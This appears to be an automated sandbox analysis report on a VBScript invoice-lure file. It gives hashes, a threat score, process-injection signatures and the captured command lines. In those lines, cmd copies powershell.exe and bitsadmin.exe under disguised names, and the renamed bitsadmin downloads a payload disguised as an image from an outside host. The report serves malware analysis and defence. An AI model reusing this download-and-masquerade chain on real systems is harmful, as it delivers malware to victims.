1b30d432a173c580e9c49c492974bb046d9702bb53a80eccd5c4137ecf9ef839 | Triage

Analysis

max time kernel
65s
max time network
68s
platform
windows10_x64
resource
win10v200430
submitted
13-07-2020 07:40

Sharing

Report Analysis Logs

General

Target

Fatt_cliente_07008120482.vbs
Size

4KB
MD5

740e42ba34a3eb4f22a7f2ce3a738a5c
SHA1

ad8a96ca8d57f0d18ff06366d507d547deb051b0
SHA256

1b30d432a173c580e9c49c492974bb046d9702bb53a80eccd5c4137ecf9ef839
SHA512

f15559533b8dadf6571e141347db4c90c4679fd57346760a4912d94d6dcc33b4049bc93565ae9acb75324b039c065f78a294dfff9594a73a6d7fcdbfee3bba54

Score

8^/10

Malware Config

Signatures

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 2916 wrote to memory of 416	2916	WScript.exe	cmd.exe
PID 2916 wrote to memory of 416	2916	WScript.exe	cmd.exe
PID 2916 wrote to memory of 808	2916	WScript.exe	cmd.exe
PID 2916 wrote to memory of 808	2916	WScript.exe	cmd.exe
PID 2916 wrote to memory of 812	2916	WScript.exe	wubvVZY.exe
PID 2916 wrote to memory of 812	2916	WScript.exe	wubvVZY.exe
PID 2916 wrote to memory of 812	2916	WScript.exe	wubvVZY.exe

Executes dropped EXE 1 IoCs

Processes:

wubvVZY.exe

pid process

812 wubvVZY.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_07008120482.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2916

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zwubvVZY.exe
2⤵
PID:416

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\wubvVZY.exe
2⤵
PID:808

C:\Users\Admin\AppData\Roaming\wubvVZY.exe
"C:\Users\Admin\AppData\Roaming\wubvVZY.exe" /transfer VWCWnV /download https://sheyenneweber.com/webol/07008120482/logo.jpg C:\Users\Admin\AppData\Roaming\logo.jpg
2⤵
- Executes dropped EXE
PID:812

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\wubvVZY.exe

Download Submit
C:\Users\Admin\AppData\Roaming\wubvVZY.exe

Download Submit
memory/416-1-0x0000000000000000-mapping.dmp

Download
memory/808-2-0x0000000000000000-mapping.dmp

Download
memory/812-4-0x0000000000000000-mapping.dmp

Download
memory/2916-0-0x0000027CB4C00000-0x0000027CB4C04000-memory.dmp

Filesize
16KB

Download